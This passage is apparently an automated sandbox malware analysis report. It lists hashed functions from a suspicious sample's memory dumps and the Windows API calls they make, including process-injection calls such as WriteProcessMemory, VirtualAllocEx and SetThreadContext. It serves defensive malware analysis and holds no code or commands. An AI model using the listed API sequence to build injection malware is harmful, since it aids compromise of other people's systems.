                                                                                                            • Opcode ID: 3a17adf29e53d13b3f85d4bc6b773e4d7119dc362dc1473c72fe2c44eb8693f8
                                                                                                            • Instruction ID: 43a60c45b3abdbe09548473813a022a6014004872662bccf6df0a92ce0fc07f1
                                                                                                            • Opcode Fuzzy Hash: 3a17adf29e53d13b3f85d4bc6b773e4d7119dc362dc1473c72fe2c44eb8693f8
                                                                                                            • Instruction Fuzzy Hash: 2E41C79160E3C04FD3075778982465A7FB29F8B218B1E01CBD182CF2E3CA188C0A83A6
                                                                                                            Function 026F534D Relevance: 3.9, Strings: 3, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tP]q$tP]q$tP]q
                                                                                                            • API String ID: 0-513720979
                                                                                                            • Opcode ID: 2c3e7c709f36c7ccdc4637317692217139ffeb487411d6db8580d67e2f0c2c73
                                                                                                            • Instruction ID: 335e142099fb0e34f0657c854bb0e0762ad3e42532ba92331b40bd0a7055f616
                                                                                                            • Opcode Fuzzy Hash: 2c3e7c709f36c7ccdc4637317692217139ffeb487411d6db8580d67e2f0c2c73
                                                                                                            • Instruction Fuzzy Hash: 243149515065809FC70A0774EB7A6AA7FB9AF43610B0CC0DADCC98B303CA268D47D7A1
                                                                                                            Function 026F7188 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Haq$Haq
                                                                                                            • API String ID: 0-4016896955
                                                                                                            • Opcode ID: 4220f1ab35a0635002cba7e17ed6e20ee92a317fedd35350842a4cca87b2fdc7
                                                                                                            • Instruction ID: a23a60a468eccaeb263f079ff019ec5ef343119c9195548b9976f3088c5fcbb8
                                                                                                            • Opcode Fuzzy Hash: 4220f1ab35a0635002cba7e17ed6e20ee92a317fedd35350842a4cca87b2fdc7
                                                                                                            • Instruction Fuzzy Hash: 49E1D3317002159FCF4A9F68D854B7EBBA6EB88301F148529EA0ACB391CF74DD42CB91
                                                                                                            Function 07AFB118 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q$PH]q
                                                                                                            • API String ID: 0-1166926398
                                                                                                            • Opcode ID: 68906b41dbce6cd3b7edfdfc10ba8c9c173b47da2c59ccede879d866c0731839
                                                                                                            • Instruction ID: fcd44b429717b6909f9317ad5ba60e3903c3ac3a70beb5a7313419389213c0f9
                                                                                                            • Opcode Fuzzy Hash: 68906b41dbce6cd3b7edfdfc10ba8c9c173b47da2c59ccede879d866c0731839
                                                                                                            • Instruction Fuzzy Hash: 93C107B4600205CFCB18DFA8D994A9DBBF2FF89310F1545A8E516AB3A1DB35EC45CB60
                                                                                                            Function 026FB205 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q$PH]q
                                                                                                            • API String ID: 0-1166926398
                                                                                                            • Opcode ID: 27d01de8c83c3f7180e2cc8ea20db02ad763e14be5e9b3107a49df7e33bd3673
                                                                                                            • Instruction ID: 40c661cd90f9ddec21990a5ae2bed39051856aab0183d1e6af97aba10d3aba0a
                                                                                                            • Opcode Fuzzy Hash: 27d01de8c83c3f7180e2cc8ea20db02ad763e14be5e9b3107a49df7e33bd3673
                                                                                                            • Instruction Fuzzy Hash: C5A18270B401088FDF489FB8D954B6E76A6EF89704F248429E606DB3A5DF78DC42CB91
                                                                                                            Function 026F7878 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,aq$,aq
                                                                                                            • API String ID: 0-2990736959
                                                                                                            • Opcode ID: 8378c07bf6401821b67ba1fb92d1cef941d28f0706ea7f888d07f0d6ee59004e
                                                                                                            • Instruction ID: e72b286c9e6bd0f7f97cf4dd8637154e634297187329d011dfafc970390a3d5f
                                                                                                            • Opcode Fuzzy Hash: 8378c07bf6401821b67ba1fb92d1cef941d28f0706ea7f888d07f0d6ee59004e
                                                                                                            • Instruction Fuzzy Hash: 02819130A00206DFDF9ACF69C884AAAF7B2FF89214F168169DA15D7365D731E941CB90
                                                                                                            Function 07150B28 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: TJbq$Te]q
                                                                                                            • API String ID: 0-3147309840
                                                                                                            • Opcode ID: c13b9647ec46951dfabb4d03250ea3dc0285d98c03fe2b84f17170770de89aec
                                                                                                            • Instruction ID: d8196b7473ccf5cf581b5968e2619d9342b5085e73128a0a86c5f49b6b214942
                                                                                                            • Opcode Fuzzy Hash: c13b9647ec46951dfabb4d03250ea3dc0285d98c03fe2b84f17170770de89aec
                                                                                                            • Instruction Fuzzy Hash: 0FF0F6323000154FCA08AB7DE55493F72EBAFCAA20315405EF50ACB3A1CE61DC0347E6
                                                                                                            Function 07AF0318 Relevance: 2.0, Strings: 1, Instructions: 747COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: S!l^
                                                                                                            • API String ID: 0-1174990032
                                                                                                            • Opcode ID: 2616f73f80587bf3e0a966fe96686f396fd221686c3f5123b3c4ef50c05fafc4
                                                                                                            • Instruction ID: 34dc2bb03809163ec0602732f274efbcef26bdf241dd38a0be53a0cea41590db
                                                                                                            • Opcode Fuzzy Hash: 2616f73f80587bf3e0a966fe96686f396fd221686c3f5123b3c4ef50c05fafc4
                                                                                                            • Instruction Fuzzy Hash: 5D6234F0D00B4ACBDB749FF4D49839E7A91AB91304F10492EE1BACB381DB38A455CB55
                                                                                                            Function 071501E8 Relevance: 1.8, Strings: 1, Instructions: 532COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 7564f860faa058c70594d30a13460c4e2a8023fced4050f177c81b4e8f0e357a
                                                                                                            • Instruction ID: 476567e450910b0593fdfd6ed9d352f5cc406ceaeed063a7a86c23943ce3fe17
                                                                                                            • Opcode Fuzzy Hash: 7564f860faa058c70594d30a13460c4e2a8023fced4050f177c81b4e8f0e357a
                                                                                                            • Instruction Fuzzy Hash: B8126F70B14214CBC748BBB8D88966DBBF2BB88704F808869D449E7394DF3C9C46CB52
                                                                                                            Function 071501F8 Relevance: 1.8, Strings: 1, Instructions: 526COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 5bf44a41e7d243693ed551f5c1b18eda3c2224f0eaddbd6506e5717b86f83156
                                                                                                            • Instruction ID: ceb0817c15cacb0a5de466e6db63717a037edfaebc477d871d6355ec045b5190
                                                                                                            • Opcode Fuzzy Hash: 5bf44a41e7d243693ed551f5c1b18eda3c2224f0eaddbd6506e5717b86f83156
                                                                                                            • Instruction Fuzzy Hash: CD125070B14214CFD748BBB8D88966DBBF2BB88704F808969D449E7394DE3C9C46CB56
                                                                                                            Function 07AF02B8 Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: S!l^
                                                                                                            • API String ID: 0-1174990032
                                                                                                            • Opcode ID: b03eb8dea02a73ac5a4ab968702a19558b2120a1cadae09f1257b3bcce6e6dea
                                                                                                            • Instruction ID: 9b45ae84fb05762a100263809b0e123dd06d35f93457a4ad2525f1bd760bb311
                                                                                                            • Opcode Fuzzy Hash: b03eb8dea02a73ac5a4ab968702a19558b2120a1cadae09f1257b3bcce6e6dea
                                                                                                            • Instruction Fuzzy Hash: EF228DF0905B8FCADB709FA4C48439FB690AB55304F20491BE2FACB356D738949ACB55
                                                                                                            Function 05B987A8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05B989FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 12a59b50f8ca8acb6b150303e76b6939425b52890b144ac05b7ae67f26fbf763
                                                                                                            • Instruction ID: 42cd6661361ef5d441004fb54d38fc5a20d4b78d065a5f814e7b0338bf80531e
                                                                                                            • Opcode Fuzzy Hash: 12a59b50f8ca8acb6b150303e76b6939425b52890b144ac05b7ae67f26fbf763
                                                                                                            • Instruction Fuzzy Hash: F9815770A00B058FDB28DF29D4447AABBF5FF89304F008969E48AD7A51D775F906CBA1
                                                                                                            Function 05B9F0A4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B9F1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 64341d2ae969edb7d829bcb85b9e9af30e261ea4f0e48542f0c810c266ae1ec1
                                                                                                            • Instruction ID: 6e55f20df2183a7366a2b0562f18f50d503bef92eabb0b43ea0e6469766d95b0
                                                                                                            • Opcode Fuzzy Hash: 64341d2ae969edb7d829bcb85b9e9af30e261ea4f0e48542f0c810c266ae1ec1
                                                                                                            • Instruction Fuzzy Hash: 2B51D0B1D003499FDF15CFA9C884ADEBBB5FF48310F24856AE419AB250D774A885CF90
                                                                                                            Function 05B9D3F8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B9F1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: bf76df3638418faa2da23ef51290e87121c4c3972010e523700b2617b86dbb21
                                                                                                            • Instruction ID: c8243f5f0f62492b195251d9ea45d86e260a8cc46cba5103b01f22cb0656a502
                                                                                                            • Opcode Fuzzy Hash: bf76df3638418faa2da23ef51290e87121c4c3972010e523700b2617b86dbb21
                                                                                                            • Instruction Fuzzy Hash: AE51B1B1D003499FDF15CF9AC884ADEBBB5FF48310F24816AE819AB210D774A845CF90
                                                                                                            Function 05BC1560 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05BC1621
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760736330.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5bc0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: f6f58dcfdd0aef994427664af8f81e8b01684fb1f2372472f73df6683aed838f
                                                                                                            • Instruction ID: adb0f05f0eefbe59a1e4760f82373a2e774254da927c6b330cf7ac17f06a2242
                                                                                                            • Opcode Fuzzy Hash: f6f58dcfdd0aef994427664af8f81e8b01684fb1f2372472f73df6683aed838f
                                                                                                            • Instruction Fuzzy Hash: 0E4129B9900345CFCB14CF99C448AAABBF5FF99314F24C499D519AB321D334A841CFA4
                                                                                                            Function 0719AE3F Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: eb285fa853b7e762e0037c0b60f9774ab24da22960059fcc12976158244224a5
                                                                                                            • Instruction ID: 0e1863428c7e103def6792049fa652791994026600619baab7393b30a5976699
                                                                                                            • Opcode Fuzzy Hash: eb285fa853b7e762e0037c0b60f9774ab24da22960059fcc12976158244224a5
                                                                                                            • Instruction Fuzzy Hash: 5A3159B580438A9FCB11CFA9C4446DEFBF4FF59710F24806AE4A4A7241D7385559CFA2
                                                                                                            Function 075D3680 Relevance: 1.6, APIs: 1, Instructions: 73memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075D36FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 5073a1177ae1869e31104b26cff9a580bead7821f53a94c44b9449b9389deb7f
                                                                                                            • Instruction ID: f62a09f320974e64c3a898cb743007a3c544b7399e381abcb3fcb425bd9a178d
                                                                                                            • Opcode Fuzzy Hash: 5073a1177ae1869e31104b26cff9a580bead7821f53a94c44b9449b9389deb7f
                                                                                                            • Instruction Fuzzy Hash: 6121F6B5900249DFCB10CF9AD985ADEBBF4FF48310F108469E869A7351D378A940CFA1
                                                                                                            Function 075DD280 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075DD310
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: bc30c7d392115af416d642f53fc3602193a03c0d6e88f55bb9c35ac3f185b850
                                                                                                            • Instruction ID: da147b162360f255b957b1c8d76a678d6cf86ae3b812fc34caaaadaba1bdfb18
                                                                                                            • Opcode Fuzzy Hash: bc30c7d392115af416d642f53fc3602193a03c0d6e88f55bb9c35ac3f185b850
                                                                                                            • Instruction Fuzzy Hash: 842105B5D003599FCB10DFAAC885BEEBBF5FF48310F10842AE959A7240D7789954CBA0
                                                                                                            Function 05B99520 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B9B056,?,?,?,?,?), ref: 05B9B117
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: d2b0507d7912f44249b4e903b3cce6dc00a169f4a7fa8315d13e346c046cbf0a
                                                                                                            • Instruction ID: 2f99306ca896f999adfafe847f7f9ff34b281cac2f4625f30eb2be7ac0ffcbb4
                                                                                                            • Opcode Fuzzy Hash: d2b0507d7912f44249b4e903b3cce6dc00a169f4a7fa8315d13e346c046cbf0a
                                                                                                            • Instruction Fuzzy Hash: 6821E7B59042589FDB10CF9AD584ADEBBF5FB48310F14805AE918A3350D378A954CFA4
                                                                                                            Function 05B9B089 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B9B056,?,?,?,?,?), ref: 05B9B117
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 577fb00fb066e38e04291a7cabdb0d5b8441b85cbf44d78b77b10163d855244c
                                                                                                            • Instruction ID: cfac3f4a6d653fdf0fb4206c3e87069321b61637827e6b6e26c7f42bdd12e3df
                                                                                                            • Opcode Fuzzy Hash: 577fb00fb066e38e04291a7cabdb0d5b8441b85cbf44d78b77b10163d855244c
                                                                                                            • Instruction Fuzzy Hash: 3C21E2B5D002589FDF10CFAAD584AEEBBF5FB48310F14845AE918A3350C378A940CFA4
                                                                                                            Function 075DC858 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 075DC8D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: d4b0769047610099e2f3e245a345113846588cacaff194f7fdb6f4a87c84d41f
                                                                                                            • Instruction ID: f0b985ce0b943f4339c8434e994cb1979f2516b72ca7b4fde07e5ba18965e7e1
                                                                                                            • Opcode Fuzzy Hash: d4b0769047610099e2f3e245a345113846588cacaff194f7fdb6f4a87c84d41f
                                                                                                            • Instruction Fuzzy Hash: 7E2104B1D002099FDB10DFAAC485BEEBBF5FF49314F14842AD519A7240CB78A945CFA1
                                                                                                            Function 075DDC70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075DDCEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: a22e0626aeafaa077fb193dc3855d659e226eedd3d2ae6f90e93567d814d5a24
                                                                                                            • Instruction ID: 9932c699c79bdaaba4f172b6a36436c25f5fa01e543a74d30b93f9d93bfb47c3
                                                                                                            • Opcode Fuzzy Hash: a22e0626aeafaa077fb193dc3855d659e226eedd3d2ae6f90e93567d814d5a24
                                                                                                            • Instruction Fuzzy Hash: 532107B19003099FDB10DFAEC4857EEBBF5FF48314F14842AD519A7240CB78A945CBA5
                                                                                                            Function 075DD9D0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 075DDA47
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 9a56e08655de729252791f017dcf2c0f4c8f9ae53022c02020a0105e34c1b444
                                                                                                            • Instruction ID: 3d2dc6ab537eb2a8291d62feec0d12c574da52b68ab45de1d2c13a05d3fac33e
                                                                                                            • Opcode Fuzzy Hash: 9a56e08655de729252791f017dcf2c0f4c8f9ae53022c02020a0105e34c1b444
                                                                                                            • Instruction Fuzzy Hash: 022115B1D003499FDB10DFAAC444AEEBBF5FF48320F10842AD519A7250CB789945CFA1
                                                                                                            Function 07B30FA0 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 07B3A288
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: 2723c2f12600960a24ba85d79a19e34ac892eee316da730c0f6cf1d0f02f7f76
                                                                                                            • Instruction ID: 5db3cab80e172ad0459e179fa250de7c30e26fde2df6c6149f30d9b2c9479a0f
                                                                                                            • Opcode Fuzzy Hash: 2723c2f12600960a24ba85d79a19e34ac892eee316da730c0f6cf1d0f02f7f76
                                                                                                            • Instruction Fuzzy Hash: CB2147B1C0061A9BDB10CF9AC844AAEFBB4EF08710F118169E818B7240D738A940CFE0
                                                                                                            Function 0719AEA0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: e38aeb5f498c924190d56de1599b6c8776e89eaba487efee99a1b9ecc08f17b3
                                                                                                            • Instruction ID: 0ab44d16f9616e09a576295bc1828316db7573d673509d4e42076b1b37e71b2e
                                                                                                            • Opcode Fuzzy Hash: e38aeb5f498c924190d56de1599b6c8776e89eaba487efee99a1b9ecc08f17b3
                                                                                                            • Instruction Fuzzy Hash: 5C21E4B59002499FCB10DF9AC584BDEFBF4FF48320F10842AE958A7250D378A544CFA1
                                                                                                            Function 075D3688 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075D36FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 5e51b3f8ec386413b82dcc53cd4268dfd48c93d9e1df9e757cb0af84aa9f3791
                                                                                                            • Instruction ID: 574f46b342a3da1d91d4d7f5a3af2b8bda8aff63093b7d429376b104f989acdd
                                                                                                            • Opcode Fuzzy Hash: 5e51b3f8ec386413b82dcc53cd4268dfd48c93d9e1df9e757cb0af84aa9f3791
                                                                                                            • Instruction Fuzzy Hash: C421D6B59002499FCB10DF9AC484ADEFBF4FF48310F108429E558A7251D378A944CFA1
                                                                                                            Function 075DCF40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075DCFAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
